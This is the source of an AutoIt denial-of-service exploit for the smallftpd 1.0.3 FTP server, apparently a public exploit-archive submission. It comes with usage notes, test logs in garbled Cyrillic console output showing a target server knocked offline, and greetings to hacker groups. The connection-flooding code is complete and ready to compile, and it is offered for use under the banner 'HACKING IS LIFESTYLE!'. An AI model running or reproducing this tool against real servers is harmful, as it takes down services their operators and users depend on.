#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Outfile=aas.exe
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#cs
smallftpd 1.0.3.dos.au3
smallftpd 1.0.3 Denial Of Service (Remote Crash) exploit;
This is simple exploit written in AutoIT that crashes Remote/Local smallftpd 1.0.3 FTP server
If you want to use exploit then you've to compile it as CUI application.
Official site of smallftpd 1.0.3 : =>
http://smallftpd.free.fr/
http://smallftpd.sourceforge.net/
http://sourceforge.net/projects/smallftpd/files/latest/download
=====================================================
Tested *remotely*: From Windows Server 2003 against Win XP SP2 (32 bit)
that runs smallftpd 1.0.3. Result: Remote denial of Service;App crashed.
=====================================================
Tested (local scope) From Win XP SP 2 (32 bit)(192.168.0.1) against Win XP SP 2 32 bit( 192.168.0.15)
that runs smallftpd 1.0.3.
Result: Remote denial of Service;App crashed.
=====================================================
Tested (local scope) from Win XP SP 2(32 bit) (192.168.0.1) against Windows 7 Ultimate SP 1 ( 192.168.0.15)
that runs smallftpd 1.0.3. (<- with XP SP3 compatible mode)
Result: Application didn't crashed but it is unable to accept any connection to port 21.
Here is the later testing result:
c:\dos\smalf\>ping 192.168.0.15
Обме� пакетами � 192.168.0.15 по 32 байт:
Отве� от 192.168.0.15: числ� байт=32 врем�=2мс TTL=128
Отве� от 192.168.0.15: числ� байт=32 врем�=5мс TTL=128cls
Статистика Ping дл� 192.168.0.15:
Пакето�: отправлено = 2, получено = 2, поте��но = 0 (0% потерь),
Приблизительно� врем� приема-передачи � мс:
c:\dos\smalf\>telnet 192.168.0.15 21
220- smallftpd 1.0.3
220- check http://smallftpd.free.fr for more information
220 report bugs to smallftpd@free.fr
�
530 Not logged in.
c:\dos\smalf\>aas.exe 192.168.0.15 21
##############################################################
########## smallftpd 1.0.3 DENIAL OF SERVICE exploit #######
########## Usage: aas.exe REMOTEIP REMOTEPORT ##########
\\\\\\\\\\ HACKING IS LIFESTYLE! //////////
##############################################################
################ WORKING ON IT! PLEASE WAIT...################
--------------------------------------------------------------
~ TRY count: ~ 40
--------------------------------------------------------------
--------------------------------------------------------------
~ TRY count: ~ 80
--------------------------------------------------------------
--------------------------------------------------------------
~ TRY count: ~ 120
--------------------------------------------------------------
--------------------------------------------------------------
~ TRY count: ~ 160
--------------------------------------------------------------
--------------------------------------------------------------
~ TRY count: ~ 200
--------------------------------------------------------------
--------------------------------------------------------------
~ TRY count: ~ 240
--------------------------------------------------------------
##############################################################
########## Mission Completed! @267 ##########
TARGET =>ftp://192.168.0.15:21/ is * DOWN ! *
##############################################################
c:\dos\smalf\>telnet 192.168.0.15 21
Подключени� � 192.168.0.15...Не удалос� откр�� подключени� � �ом� узлу, на порт 21: Сбой подключени�
c:\dos\smalf\>telnet 192.168.0.15 21
Подключени� � 192.168.0.15...Не удалос� откр�� подключени� � �ом� узлу, на порт 21: Сбой подключени�
c:\dos\smalf\>ping 192.168.0.15
Обме� пакетами � 192.168.0.15 по 32 байт:
Отве� от 192.168.0.15: числ� байт=32 врем�=1мс TTL=128
Отве� от 192.168.0.15: числ� байт=32 врем�=1мс TTL=128
Статистика Ping дл� 192.168.0.15:
Пакето�: отправлено = 2, получено = 2, поте��но = 0 (0% потерь),
Приблизительно� врем� приема-передачи � мс:
Минимально� = 1мсек, Максимал�ое = 1 мсек, Средне� = 1 мсек
Control-C
^C
c:\dos\smalf\>telnet 192.168.0.15 21
Подключени� � 192.168.0.15...Не удалос� откр�� подключени� � �ом� узлу, на порт 21: Сбой подключени�
c:\dos\smalf\>ipconfig|find /i "192.168"
IP-рф�� . . . . . . . . . . . . : 192.168.0.1
+ёэ��� °ы� . . . . . . . . . . : 192.168.0.1
/AkaStep
#ce
#include <String.au3>
$f=_StringRepeat('#',10);
$USE_PROTO='ftp://';
$INVALIDIP='INVALID IP FORMAT';
$INVALIDPORT='INVALID PORT NUMBER!';
$HTTPUA='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';
$msg_usage=$f & ' smallftpd 1.0.3 DENIAL OF SERVICE exploit ' & StringMid($f,1,7) & @CRLF & _
$f & " Usage: " & _
@ScriptName & ' REMOTEIP ' & ' REMOTEPORT ' & $f & @CRLF & _
StringReplace($f,'#','\') & _StringRepeat(' ',10) & _
'HACKING IS LIFESTYLE!' & _StringRepeat(' ',10) & StringReplace($f,'#','/')
if $CmdLine[0]=0 Then
MsgBox(64,"","This is a console Application!" & @CRLF & 'More Info: ' & @ScriptName & ' --help' & @CRLF & _
'Invoke It from MSDOS!',5)
exit;
EndIf
if $CmdLine[0] <> 2 Then
ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
exit;
EndIf
$ip=StringMid($CmdLine[1],1,15);//255.255.255.255
$port=StringMid($CmdLine[2],1,5);//65535
validateall($ip,$port)
func validateall($ip,$port)
if not StringIsDigit($port) Or NOT (Number($port)<=65535) Then
ConsoleWrite($INVALIDPORT);
Exit;
EndIf
TCPStartup();
$ip=TCPNameToIP($ip);
TCPShutdown();
$z=StringSplit($ip,Chr(46));//Asc('.')
if @error then
ConsoleWrite($INVALIDIP);
exit;
EndIf
for $x=0 to $z[0]
if Number($z[0]-1) <>3 Then
ConsoleWrite($INVALIDIP);
Exit
EndIf
if $x>=1 AND Not StringIsDigit($z[$x]) Or StringLen($z[$x])>3 Then
ConsoleWrite($INVALIDIP);
exit;
EndIf
Next
$x=0;
ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
ConsoleWrite(@CRLF & $f & _StringRepeat('#',6) & ' WORKING ON IT! PLEASE WAIT...' & _StringRepeat('#',6) & $f & @CRLF)
downit($ip,$port,$x)
EndFunc; =>validateall($ip,$port)
Func downit($ip,$port,$x)
$x+=1;
TCPStartup()
$socket_con = -1
$socket_con = TCPConnect($ip, $port)
If not @error Then
if Mod($x,40)=0 Then
ConsoleWrite(_StringRepeat('-',62) & @CRLF & '~ TRY count: ~ ' & $x & @CRLF & _StringRepeat('-',62) & @CRLF)
Sleep(Random(1000,1800,1));
EndIf
downit($ip,$port,$x)
Else
Beep(1000,1500)
ConsoleWrite(_StringRepeat('#',62) & @CRLF & $f & _StringRepeat(' ',12) & 'Mission Completed! @' & $x & _StringRepeat(' ',12) & $f & @CRLF & _
_StringRepeat(' ',5) & ' TARGET =>' & StringLower($USE_PROTO & $ip & ':' & $port) & '/ is * DOWN ! * ' & @CRLF & _StringRepeat('#',62));
TCPShutdown();
exit;
EndIf
EndFunc; ==>downit($ip,$port,$x)
#cs
================================================
KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
waraxe.us
exploit-db.com
to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers
Also special thanks to: ottoman38 & HERO_AZE
*Super special KUDOS to my bro Brendan Coles!
Love you and Respect you dude!
Thank you!*
================================================
#ce